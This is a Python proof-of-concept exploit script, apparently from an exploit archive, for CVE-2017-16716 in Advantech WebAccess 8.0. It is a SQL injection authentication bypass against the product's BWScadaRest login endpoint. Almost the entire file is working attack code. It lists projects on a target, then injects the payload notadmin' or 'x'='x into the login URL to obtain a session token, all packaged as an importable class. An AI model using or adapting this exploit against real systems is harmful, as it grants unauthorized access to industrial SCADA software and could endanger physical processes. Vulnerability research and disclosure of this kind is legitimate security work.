#!/usr/bin/python2.7
# Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability
# Date: 01-13-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.advantech.com
# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe
# Version: Advantech WebAccess 8.0-2015.08.16
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-16716
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-065/
# Notes:
#
# There are two service interfaces:
# 1) SOAP
# 2) REST
#
# This PoC targets REST
#
# The web services did not work out of the box, and a new website/app was created in IIS for testing.
# This issue was potentially due to the fact that testing was completed against a trial version.
# PoC may need slight tweaks depending on configuration of the web service.
#
# Original vulnerability was reported for more recent software version.
#
# This WebAccessAuthBypass class can be imported :-)
import sys, requests
from xml.etree import ElementTree
class WebAccessAuthBypass:
def __init__(self, ip, port):
self.ip = ip
self.port = port
self.base_url = "http://%s:%s/BWMobileService/BWScadaRest.svc/" % (ip, port)
def convert_entities(self, s):
return s.replace('>', '>').replace('<', '<') # convert html entities in response, for parsing
def get_project_list(self):
print 'Getting list of projects...'
res = requests.get(self.base_url)
projects = list()
if res.status_code != 200:
print 'Bad HTTP response...'
else:
if 'PROJECT' not in res.text:
print 'No projects listed by service.'
else:
s = self.convert_entities(res.text)
xml = ElementTree.fromstring(s)
for project_list in xml:
for project in project_list:
name = project.get('NAME')
if name is not None:
projects.append(name)
if len(projects) > 0:
print 'Found the following projects: ' + str(projects)
return projects
else:
return None
# returns a token
def login(self, project):
# SQL Injection into the user parameter
url = self.base_url + "Login/" + project + "/notadmin'%20or%20'x'%3D'x/nopass" # notadmin' or 'x'='x
res = requests.get(url)
token = None
if res.status_code != 200:
print 'Bad HTTP response...'
else:
if 'OK TOKEN' not in res.text:
print 'No token returned by service.'
else:
s = self.convert_entities(res.text)
xml = ElementTree.fromstring(s)
if len(xml) > 0:
token = xml[0].get('TOKEN')
return token
# token returned can be used for more transactions
def get_token(self):
project_list = self.get_project_list()
project = project_list[0] # might as well pick the first project
token = self.login(project_list[0])
return token
if __name__ == "__main__":
ip = 'targetip'
port = 'port#'
bypass = WebAccessAuthBypass(ip, port)
token = bypass.get_token()
if token is not None:
print 'Successfully got an authentication token: ' + token
else:
print 'Unsuccessful.'
